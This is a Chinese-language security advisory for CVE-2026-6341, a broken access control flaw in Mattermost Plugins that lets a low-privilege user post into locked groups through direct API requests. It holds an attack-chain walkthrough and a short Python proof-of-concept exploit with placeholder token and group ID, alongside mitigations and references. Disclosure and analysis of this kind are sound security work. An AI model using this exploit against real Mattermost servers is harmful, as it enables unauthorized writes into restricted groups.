CVE-2026-6341 CVSS 4.3 中危

CVE-2026-6341 Mattermost Plugins 访问控制失效漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6341

漏洞类型

访问控制失效

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Mattermost Plugins

漏洞概述

Mattermost Plugins 在特定版本（<=11.5, 11.1.5等）中存在访问控制缺陷。由于API层面缺乏对用户组权限的严格校验，属于多个组别的用户可以通过发送直接API请求，绕过前端限制，向被锁定的组内创建议题或附加评论，导致未授权的信息写入。

技术细节

该漏洞源于业务逻辑层面的权限校验缺失。在正常的Web界面交互中，系统会限制用户只能在特定权限的组内进行发帖或评论操作。然而，在后端API接口处，未对发起请求的用户是否属于目标组（Target Group）以及是否具备在该组内创建Issue的权限进行二次验证。攻击者若同时拥有普通组和锁定组的成员身份，只需获取锁定组的Group ID，即可构造恶意HTTP POST请求，直接调用API接口向锁定组写入数据。这属于典型的Broken Access Control（越权访问）漏洞。

攻击链分析

STEP 1

1. 信息收集

攻击者确认自己是某个锁定组（Locked Group）的成员，并获取该组的Group ID。

STEP 2

2. 身份认证

攻击者使用自己的合法凭证登录 Mattermost，获取有效的 Session Token 或 API Key。

STEP 3

3. 构造请求

攻击者构造一个向 API 发送创建议题（Post/Issue）的 HTTP POST 请求，并在参数中指定锁定组的 ID。

STEP 4

4. 越权执行

服务器接收请求，由于缺少 API 级别的权限校验，直接处理请求并在锁定组中创建了内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
TARGET_URL = "https://mattermost.example.com/api/v4/posts"
# Replace with a valid session token or auth credentials
HEADERS = {
    "Authorization": "Bearer YOUR_SESSION_TOKEN",
    "Content-Type": "application/json"
}

# The ID of the locked/restricted group the user is a member of
# but should not be able to post to via API directly
LOCKED_GROUP_ID = "GROUP_ID_HERE"

# Payload to create an issue/post in the locked group
payload = {
    "channel_id": LOCKED_GROUP_ID,
    "message": "This is an unauthorized post created via API exploit."
}

try:
    response = requests.post(TARGET_URL, json=payload, headers=HEADERS)
    if response.status_code == 201:
        print("[+] Exploit successful! Post created in locked group.")
        print("[+] Response:", response.json())
    else:
        print("[-] Exploit failed or already patched.")
        print("[-] Status Code:", response.status_code)
        print("[-] Response:", response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

Mattermost Plugins <= 11.5

Mattermost Plugins <= 11.1.5

Mattermost Plugins <= 10.13.11

Mattermost Plugins <= 11.3.4.0

防御指南

临时缓解措施

建议立即检查 Mattermost 系统配置，如果无法立即升级，应暂时禁用受影响插件或限制对受影响 API 端点的外部访问，仅允许受信任的内网 IP 调用，同时监控是否存在向受限组创建内容的异常行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6341
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6341
3 Details https://www.cvedetails.com/cve/CVE-2026-6341/
4 VulDB https://vuldb.com/cve/CVE-2026-6341
5 Link https://mattermost.com/security-updates

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表